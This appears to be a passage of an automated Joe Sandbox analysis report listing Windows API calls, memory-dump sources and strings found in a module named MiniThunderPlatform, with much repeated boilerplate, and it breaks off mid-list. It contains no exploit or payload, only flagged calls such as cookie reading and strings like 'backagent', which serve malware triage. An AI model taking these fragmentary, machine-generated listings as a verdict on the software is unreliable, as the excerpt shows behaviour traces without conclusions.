                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@?append@?$basic_string@V12@$V01@@V12@@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1380449886-0
                                                                                                                                              APIs
                                                                                                                                              • InternetGetCookieA.WININET(?,00000000,?,?), ref: 100A414B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CookieInternet
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 930238652-0
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102768F0), ref: 10012336
                                                                                                                                                • Part of subcall function 10011185: memset.MSVCR71(?,00000000,00000104,00000000,102768F0,00000104), ref: 100111C2
                                                                                                                                                • Part of subcall function 10011185: wcslen.MSVCR71(?,?,00000104,00000000,00000000,00000000,102768F0,00000104), ref: 100111D2
                                                                                                                                                • Part of subcall function 10011185: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 100111DD
                                                                                                                                                • Part of subcall function 10011185: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?), ref: 100111F8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??0?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$ByteCharMultiWidememsetwcslen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3191298366-0
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102768F0,00000014), ref: 10012398
                                                                                                                                                • Part of subcall function 10011185: memset.MSVCR71(?,00000000,00000104,00000000,102768F0,00000104), ref: 100111C2
                                                                                                                                                • Part of subcall function 10011185: wcslen.MSVCR71(?,?,00000104,00000000,00000000,00000000,102768F0,00000104), ref: 100111D2
                                                                                                                                                • Part of subcall function 10011185: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 100111DD
                                                                                                                                                • Part of subcall function 10011185: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?), ref: 100111F8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??0?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$ByteCharMultiWidememsetwcslen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3191298366-0
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102768F0), ref: 10011A1D
                                                                                                                                                • Part of subcall function 10011185: memset.MSVCR71(?,00000000,00000104,00000000,102768F0,00000104), ref: 100111C2
                                                                                                                                                • Part of subcall function 10011185: wcslen.MSVCR71(?,?,00000104,00000000,00000000,00000000,102768F0,00000104), ref: 100111D2
                                                                                                                                                • Part of subcall function 10011185: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 100111DD
                                                                                                                                                • Part of subcall function 10011185: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?), ref: 100111F8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??0?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$ByteCharMultiWidememsetwcslen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3191298366-0
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 10055A20: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(.sandai.net,?,?,774D23A0), ref: 10055A60
                                                                                                                                                • Part of subcall function 10055A20: ?rfind@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP71(?,FFFFFFFF,?), ref: 10055AA2
                                                                                                                                                • Part of subcall function 10055A20: ??0?$basic_ostringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@H@Z.MSVCP71(00000002,00000001), ref: 10055ADB
                                                                                                                                                • Part of subcall function 10055A20: ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@D@Z.MSVCP71(00000000), ref: 10055B07
                                                                                                                                                • Part of subcall function 10055A20: ?str@?$basic_ostringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@2@XZ.MSVCP71 ref: 10055B52
                                                                                                                                              • SetEvent.KERNEL32(?,00000000,10057343,?,?,?,?,?,0000002E,?,00000000,1005901A,?,1005BF55,?,92492493), ref: 10055D6F
                                                                                                                                                • Part of subcall function 10055950: GetPrivateProfileIntA.KERNEL32(adns_fail_cache,enable,00000000,-00000004), ref: 100559BF
                                                                                                                                                • Part of subcall function 10055950: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,?,?,?,?,?,?,00000000,10245167,000000FF,10055D61,?,00000000), ref: 100559CD
                                                                                                                                                • Part of subcall function 10055950: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100559DC
                                                                                                                                                • Part of subcall function 10055950: GetTickCount.KERNEL32 ref: 100559F4
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: U?$char_traits@$D@std@@V?$allocator@$D@2@@std@@$??1?$basic_string@$??$?6??0?$basic_ostringstream@??0?$basic_string@?rfind@?$basic_string@?str@?$basic_ostringstream@CountD@2@@2@D@std@@@0@D@std@@@std@@EventPrivateProfileTickV10@V?$basic_ostream@V?$basic_string@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1547212780-0
                                                                                                                                              APIs
                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,1005C250,00000000,00000000,?), ref: 1005C275
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateThread
                                                                                                                                              • String ID:
                                                                                                                                              APIs
                                                                                                                                              • GetFileAttributesA.KERNEL32(?,1002C6D8,?), ref: 1002C6A2
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AttributesFile
                                                                                                                                              • String ID:
                                                                                                                                              APIs
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?,?,10002351), ref: 1011467F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??3@
                                                                                                                                              • String ID:
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??3@
                                                                                                                                              • String ID:
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 1004F9B0: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,102448B9,000000FF), ref: 1004F9EF
                                                                                                                                                • Part of subcall function 1004F9B0: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,102448B9,000000FF), ref: 1004F9FC
                                                                                                                                                • Part of subcall function 1004F9B0: ??3@YAXPAX@Z.MSVCR71(?,?,?,?,?,?,?,?,?,102448B9,000000FF), ref: 1004FA09
                                                                                                                                                • Part of subcall function 1004F9B0: ??3@YAXPAX@Z.MSVCR71(?,?,?,?,?,?,?,?,?,102448B9,000000FF), ref: 1004FA5E
                                                                                                                                                • Part of subcall function 1004F9B0: ??3@YAXPAX@Z.MSVCR71(?), ref: 1004FA74
                                                                                                                                                • Part of subcall function 1004F9B0: RtlDeleteCriticalSection.NTDLL ref: 1004FA97
                                                                                                                                                • Part of subcall function 1004F9B0: ??3@YAXPAX@Z.MSVCR71(?,?,?,?,?,?,?,?,102448B9,000000FF), ref: 1004FAAB
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71 ref: 1004FF20
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??3@$CloseHandle$CriticalDeleteSection
                                                                                                                                              • String ID:
                                                                                                                                              APIs
                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 1021AB50
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CurrentThread
                                                                                                                                              • String ID:
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z.MSVCP71(?,?), ref: 100712CF
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10071304
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10071311
                                                                                                                                                • Part of subcall function 10070AC0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,000000A8,00000000,102471AA,000000FF,100E6C13), ref: 10070B66
                                                                                                                                                • Part of subcall function 100258AC: malloc.MSVCR71(100104C9,?,100104C9,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 100258C5
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000,?,?), ref: 100713AD
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 100713B9
                                                                                                                                              • FindFirstFileA.KERNEL32(?,?,?), ref: 100713FC
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 10071412
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10071590
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1007159D
                                                                                                                                                • Part of subcall function 10086B00: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(buffer_len,00000000), ref: 10086B2D
                                                                                                                                                • Part of subcall function 10086B00: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 10086B44
                                                                                                                                                • Part of subcall function 10086B00: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,?), ref: 10086BA6
                                                                                                                                                • Part of subcall function 10086B00: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,?), ref: 10086BB8
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$??0?$basic_string@$Find$?assign@?$basic_string@CloseFileFirstV12@V12@@malloc
                                                                                                                                              • String ID: \*.*
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(disable_query_hub,?,00000000), ref: 100C0116
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 100C0130
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,00000000), ref: 100C0163
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100C0178
                                                                                                                                              • GetTickCount.KERNEL32 ref: 100C0186
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102768F0,backagent), ref: 100C023B
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,00000000,?,?,?,?,?,00000001), ref: 100C02E1
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100C0690
                                                                                                                                                • Part of subcall function 10089DA0: RtlEnterCriticalSection.NTDLL(?), ref: 10089DC8
                                                                                                                                                • Part of subcall function 10089DA0: RtlLeaveCriticalSection.NTDLL(?), ref: 10089DE7
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102768F0,backagent), ref: 100C02F9
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102768F0,backagent), ref: 100C0518
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102768F0,backagent), ref: 100C05D4
                                                                                                                                                • Part of subcall function 100298F0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102768F0), ref: 10029935
                                                                                                                                                • Part of subcall function 1006E2C0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1006E2FD
                                                                                                                                                • Part of subcall function 1006E2C0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 1006E342
                                                                                                                                                • Part of subcall function 1006E2C0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1006E354
                                                                                                                                                • Part of subcall function 100EAED3: __EH_prolog.LIBCMT ref: 100EAED8
                                                                                                                                                • Part of subcall function 100EAED3: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 100EAF32
                                                                                                                                                • Part of subcall function 100EAED3: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 100EAF3C
                                                                                                                                                • Part of subcall function 100EAED3: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 100EAF49
                                                                                                                                                • Part of subcall function 100EAED3: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 100EAFA2
                                                                                                                                                • Part of subcall function 100EAED3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,00000002), ref: 100EAFD7
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,00000000,?,?,?,?,?,00000000), ref: 100C067F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$??1?$basic_string@$?assign@?$basic_string@V12@V12@@$CriticalSectionV01@@$CountEnterH_prologLeaveTick
                                                                                                                                              • String ID: backagent$disable_query_hub
                                                                                                                                              • API String ID: 3804703749-972584134
                                                                                                                                              APIs
                                                                                                                                              • lstrlenW.KERNEL32(?), ref: 10021430
                                                                                                                                              • LoadLibraryExA.KERNEL32(00000000,00000000,00000002), ref: 100214A6
                                                                                                                                              • FindResourceA.KERNEL32(00000000,?,?), ref: 100214D1
                                                                                                                                              • LoadResource.KERNEL32(00000000,00000000), ref: 100214DF
                                                                                                                                              • SizeofResource.KERNEL32(00000000,00000000), ref: 100214F8
                                                                                                                                              • memcpy.MSVCR71(?,?,00000000), ref: 1002154C
                                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 10021579
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Resource$LibraryLoad$FindFreeSizeoflstrlenmemcpy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1030141578-0
                                                                                                                                              APIs
                                                                                                                                              • GetThreadLocale.KERNEL32 ref: 100010DD
                                                                                                                                              • GetLocaleInfoA.KERNEL32(00000000,00001004,?,00000007), ref: 100010EF
                                                                                                                                              • GetACP.KERNEL32 ref: 10001118
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Locale$InfoThread
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4232894706-0
                                                                                                                                              APIs
                                                                                                                                              • ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71(?,102768F0,?,?,?), ref: 100291B0
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 100291F8
                                                                                                                                              • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP71(://,00000000,00000003), ref: 1002921D
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@II@Z.MSVCP71(?,00000000,-00000003), ref: 10029247
                                                                                                                                              • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP71(?,-00000003,00000001), ref: 10029261
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@II@Z.MSVCP71(?,-00000003,00000000), ref: 10029293
                                                                                                                                              • ?rfind@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP71(0000002F,00000000,00000001), ref: 100292B9
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@II@Z.MSVCP71(?,00000000,00000000), ref: 100292D9
